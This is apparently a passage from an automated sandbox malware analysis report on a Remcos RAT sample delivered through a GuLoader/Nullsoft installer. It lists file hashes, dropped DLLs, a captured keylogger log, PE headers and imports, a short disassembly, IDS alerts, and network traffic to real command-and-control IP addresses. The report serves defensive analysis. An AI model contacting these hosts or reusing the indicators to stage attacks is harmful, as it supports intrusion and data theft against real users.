                                                                                                                                                                                                                        • Filename: H66BPNLUSu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: H66BPNLUSu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: AlKwm5EGna.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Lithoglyptic.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Lithoglyptic.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 5283079616_INV_SZV_WJG_001_20230830_180210.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 5283079616_INV_SZV_WJG_001_20230830_180210.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Fiyat_Talebi_Ticari_liste.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                        Entropy (8bit):5.099620413135966
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:oWa8cSzvTyl4tgi8pPjQM0PuAg0YNyZIFtSP:DaBSzm+t18pZ0WAg0RZIFg
                                                                                                                                                                                                                        MD5:D6C3DD680C6467D07D730255D0EE5D87
                                                                                                                                                                                                                        SHA1:57E7A1D142032652256291B8ED2703B3DC1DFA9B
                                                                                                                                                                                                                        SHA-256:AEDB5122C12037BCF5C79C2197D1474E759CF47C67C37CDB21CF27428854A55B
                                                                                                                                                                                                                        SHA-512:C28613D6D91C1F1F7951116F114DA1C49E5F4994C855E522930BB4A8BDD73F12CADF1C6DCB84FC8D9F983EC60A40AC39522D3F86695E17EC88DA4BD91C7B6A51
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....z.W...........!.........0...............0.......................................................................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..v............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                                                                        Entropy (8bit):5.140229856656103
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                                                                                                                                                                        MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                                                                                                                                                                        SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                                                                                                                                                                        SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                                                                                                                                                                        SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):424
                                                                                                                                                                                                                        Entropy (8bit):3.431991004405738
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:KlrlDQecmlrlDVbWFe5ElrlDglrlDPbWItN2eKl:+ltcSlZWqMlgljWItgl
                                                                                                                                                                                                                        MD5:6814899DCFB6C5DAE3EF97ED2CBFEBDD
                                                                                                                                                                                                                        SHA1:433FE403E34A12FDC2112389165E1FE59CA82519
                                                                                                                                                                                                                        SHA-256:87AC004FE24CAD0484F7E8AAEC60709929E2AFD1F43F15146785D9C2FB86CA9F
                                                                                                                                                                                                                        SHA-512:C77036A22CBA54AE30E970CCF8D0AAB98E34C1767560BA70AE428F32D2AA9EAA4BD4BCC2CB8B6F9C1018A3442F62A46E7901C8D28293F2A69D721F8484A23391
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
                                                                                                                                                                                                                        Preview:....[.2.0.2.3./.1.0./.2.0. .1.7.:.4.4.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.2.0. .1.7.:.4.4.:.1.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.2.0. .1.7.:.4.4.:.1.7. .R.u.n.].........[.2.0.2.3./.1.0./.2.0. .1.7.:.4.4.:.2.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .6.9.4.4.3. .m.i.n.u.t.e.s. .}.....
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                        Entropy (8bit):7.91573985412149
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        File size:2'716'872 bytes
                                                                                                                                                                                                                        MD5:aa9c44eda9af9222c5cab2466bc44f5a
                                                                                                                                                                                                                        SHA1:b5d7bcdf2637cee61c36d7a50d628288c3c5401e
                                                                                                                                                                                                                        SHA256:b58a548a509a5a2453800587352c8a7ff970dba696e82a69343738ef94073a8f
                                                                                                                                                                                                                        SHA512:a0a5e07c8627f7149a6a535ff201fb2aae422bbf2505eb6426edf55fcb471cf78ef7e07066185276f072fb14191d6c5942efcb100ea82419b9be4a50938f051b
                                                                                                                                                                                                                        SSDEEP:49152:cRqw2aja8QnXN81nUCV5VliUYmuyKLbokCQf8TlJoT9ESCPRGT8PsJ:cxPen9+n3r5YcsboCc29DKGYsJ
                                                                                                                                                                                                                        TLSH:0CC5236DD214C0A3E65015345EE7DF316F269C5494604AA627F8BE1F3DBE3037C2A2EA
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
                                                                                                                                                                                                                        Icon Hash:0721587958601f07
                                                                                                                                                                                                                        Entrypoint:0x4032a0
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                        Signature Issuer:E=Stophanen@Yawns.Sny, OU="glossmeter Crawlers Rufgardins ", O=Hobnobs, L=Oberr\x9cdern, S=Grand Est, C=FR
                                                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                        • 07/02/2023 00:33:52 06/02/2026 00:33:52
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                        • E=Stophanen@Yawns.Sny, OU="glossmeter Crawlers Rufgardins ", O=Hobnobs, L=Oberr\x9cdern, S=Grand Est, C=FR
                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                        Thumbprint MD5:0F35215EE81B423169B3103299C65A52
                                                                                                                                                                                                                        Thumbprint SHA-1:C2A30D5F9BEF516DD0F2BEB279BCD342532FE24E
                                                                                                                                                                                                                        Thumbprint SHA-256:D4C1A38CDE32A066072EF832E385C28FB553B08C020AC2FA327B35D646A18D78
                                                                                                                                                                                                                        Serial:1E9F612F35843EF7C10B1A3B7D35A8A126FD888B
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                        call dword ptr [004080B0h]
                                                                                                                                                                                                                        call dword ptr [004080ACh]
                                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                                        je 00007F25F0833443h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call 00007F25F0836584h
                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                        je 00007F25F0833439h
                                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                        mov esi, 004082B8h
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call 00007F25F08364FEh
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call dword ptr [0040815Ch]
                                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                        jne 00007F25F083341Ch
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 00000009h
                                                                                                                                                                                                                        call 00007F25F0836556h
                                                                                                                                                                                                                        push 00000007h
                                                                                                                                                                                                                        call 00007F25F083654Fh
                                                                                                                                                                                                                        mov dword ptr [00434EE4h], eax
                                                                                                                                                                                                                        call dword ptr [0040803Ch]
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [004082A4h]
                                                                                                                                                                                                                        mov dword ptr [00434F98h], eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push 0042B208h
                                                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                                                        push 0040A2C8h
                                                                                                                                                                                                                        push 00433EE0h
                                                                                                                                                                                                                        call 00007F25F0836138h
                                                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                                                        mov ebp, 0043F000h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        call 00007F25F0836126h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [00408174h]
                                                                                                                                                                                                                        add word ptr [eax], 0000h
                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x309a8.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x2952b00x2218
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x637b0x6400False0.671484375data6.484796945043301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x80000x14b00x1600False0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0xa0000x2afd80x600False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .ndata0x350000x220000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rsrc0x570000x309a80x30a00False0.4110298843187661data4.7411066985802535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_BITMAP0x574300x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                                                        RT_ICON0x577980x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2446912338814622
                                                                                                                                                                                                                        RT_ICON0x67fc00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3060752575152407
                                                                                                                                                                                                                        RT_ICON0x714680x7d43PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9907381420151558
                                                                                                                                                                                                                        RT_ICON0x791b00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.32587800369685765
                                                                                                                                                                                                                        RT_ICON0x7e6380x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.31973311289560696
                                                                                                                                                                                                                        RT_ICON0x828600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38163900414937757
                                                                                                                                                                                                                        RT_ICON0x84e080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41862101313320826
                                                                                                                                                                                                                        RT_ICON0x85eb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5073770491803279
                                                                                                                                                                                                                        RT_ICON0x868380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                                                                                                                                                        RT_DIALOG0x86ca00x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                                                        RT_DIALOG0x86de80x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                                                        RT_DIALOG0x86f280x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                        RT_DIALOG0x870280x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                        RT_DIALOG0x871480xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                                        RT_DIALOG0x872100x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                        RT_GROUP_ICON0x872700x84dataEnglishUnited States0.7348484848484849
                                                                                                                                                                                                                        RT_VERSION0x872f80x36cdataEnglishUnited States0.4954337899543379
                                                                                                                                                                                                                        RT_MANIFEST0x876680x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                                                                                        ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        192.168.11.2094.156.6.2535003124022032776 10/20/23-17:44:14.663509TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        94.156.6.253192.168.11.202402500312032777 10/20/23-17:50:36.539605TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        192.168.11.2077.238.121.25050030802855192 10/20/23-17:44:11.404566TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.006433964 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.403332949 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.403520107 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.404566050 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801547050 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801636934 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801719904 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801789999 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801860094 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801912069 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801912069 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801930904 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801994085 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802004099 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802056074 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802077055 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802146912 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802217007 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802237034 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802237034 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802289009 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802313089 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802470922 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802565098 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195492983 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195584059 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195720911 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195810080 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195972919 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196091890 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196171999 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196264029 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196288109 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196419954 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196485996 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196511984 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196584940 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196595907 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196641922 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196731091 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196806908 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196851015 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196892023 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196928024 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.196974993 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197031021 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197107077 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197160959 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197182894 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197222948 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197274923 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197288036 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197319031 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197336912 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197370052 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197422981 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197443962 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197464943 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197525978 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197573900 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.197671890 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592000961 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592119932 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592175961 CEST805003077.238.121.250192.168.11.20
